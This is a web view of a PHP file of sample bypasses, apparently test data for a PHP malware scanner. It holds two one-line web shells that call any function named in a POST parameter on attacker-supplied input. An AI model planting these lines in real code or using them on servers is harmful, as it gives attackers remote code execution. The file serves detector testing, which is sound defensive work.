summaryrefslogtreecommitdiff
path: root/data/samples/artificial/bypasses.php
blob: 9d849a41f1a753ba29d23779a57a1b7722f7f494 (plain)
1
2
3
4
5
6
7
<?php 

// https://rstforums.com/forum/topic/98500-php-malware-finder/?do=findComment&comment=615687
print_r(call_user_func_array($_POST['functie'], array($_POST['argv'])));

// https://github.com/nbs-system/php-malware-finder/commit/47d86bf92eb15fe65dd4efbc04d0004856e88ddd#commitcomment-16355734
print_r($_POST['funct']($_POST['argv']));